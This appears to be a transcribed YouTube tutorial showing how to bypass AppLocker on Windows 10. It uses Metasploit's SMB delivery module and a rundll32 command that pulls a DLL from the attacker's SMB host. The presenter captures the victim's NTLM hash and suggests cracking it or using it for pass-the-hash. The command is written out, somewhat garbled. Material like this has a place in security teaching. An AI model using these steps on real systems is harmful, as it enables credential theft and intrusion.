Hey, happy Friday, guys. Welcome back to my YouTube channel. Don't forget to like, subscribe, and share this video. Today we'll be seeing something or learning something interesting. So it's going to be basically bypassing Applocker policy, but I've seen this vulnerability and attack before, which I thought Microsoft has patched, or fixed it, but apparently it's still out there and it's still working effectively. But the kind of actions or the how this attack works right now is kind of different from the previous one I know. So basically, is going to run a malicious DLL file command. We're going to use a metasploit to craft a malicious DLL file, and also it's going to give us a command to run on the victim computer. So once you run this command, you're going to have a remote access to the system on your attacking computer system. That is how it works before, but now you're not going to have remote access, but you're going to capture the user NTLM, user's password NTLM hash. So basically, instead of having remote access, you can only capture the user hash. And you don't know what we can do with that. You can do pass the hash attack with that. You can crack it offline with a lot of tools out there that you can use. A lot of things you can use or you can do with the NTLM hash here. But the one thing that I discovered as well that is kind of interesting is even with the Microsoft Windows Defender firewall on and the real-time protection, this attack still works perfectly as of today, and that's why I found it interesting. So nothing is even blocking the command from being running on the system with all this protection on. So I found this very interesting. I think it's something to show you guys. If you have known this or if you have seen this before, that's fine. You can still learn one or two things. And if you're still new or this kind of attack is new, I'm sure you will learn a lot as well. So the only thing we need is a Metasploit framework, which I already open as well, and we need Metasploit framework, our attacking machine, which is Kali Linux, and the Windows system. We're going to use Windows 10. All the protection and active. Nothing is, is turned off as of this point. So, let's see how this works and let's dive into it. So we're going to use SMB delivery exploit on Metasploit. So that's a payload. That's the exploit we're going to use. Use Windows /SMB/. So we have this exploit already. So one thing we're going to set is the SRV host. If you look at the options, let's check options. Oh, sorry. So yeah, this is the only thing. This is the only thing we're going to set here. It is the SRV host. Well, we're going to put our Kali IP here, which is we can use IP space here to check. 192.168.0.0.4.2. So let's set that. 168.104.2. Okay. Oh, something's missing here. Let's set SRV. Okay. Set SRV host. Two. Good. So before I proceed, this video is for educational purposes only. Do not attack any computer you do not have access to, or any network you don't have a permission to hack, or it's against the law. So this video is basically for educational purposes and just learning only. So now we have set the SR variables. Then we're going to run the command. I'll just type run. So this is basically the command generated for us that we're going to run on our remote machine here. So there's the command. So I will go straight to my Windows. Okay, so let's check CMD on prompt. So basically I'm going to let's see if I can make this bigger. See, okay, I think it's gonna go. Okay, now we're going to copy this command. This is that command, and just run it here. So I'll just type it out. DLL32.exe /192.168.04.2 /EZJ/hi/test.dll, 0. So basically this is the command. Still us to one. Typed it out here. So let's press enter to see. Now you can see this command run successfully, and after that, if you check here, you discovered we have this user NTLMv here. So from there you can copy this hash and just try to crack it with Hashcat or John the Ripper to see if you can get the clear test of the hash. So basically this, nothing is blocking this, everything runs successfully, the command runs successfully. If you check the Windows Defender here, you see everything is on. Windows Defender stage is on. If you go to the Windows real-time protection, you just type it here. See, Windows security, I think. Okay, here. So if you go here, go to Mouse protection, go to manage settings, you see the real-time protection is absolutely on as well. So basically, we were able to capture the hash with the security on. So the next thing is to just save it in the test file, just try to crack it load. You can also bypass the hash attack with this kind of hash as well. A lot of things you can do with this information you have here. I'm sure you'll find this interesting and very educative as well. This only works on Windows 10 presently. I tried it on Windows 11. It doesn't work, but currently it's still working on Windows 10. So yeah, that is basically how this attack works. So I believe you found this interesting and very educative. Turn on the notification so that whenever I post, you can easily get the notification. Uh, Thanks once again, guys, and happy Friday to you all.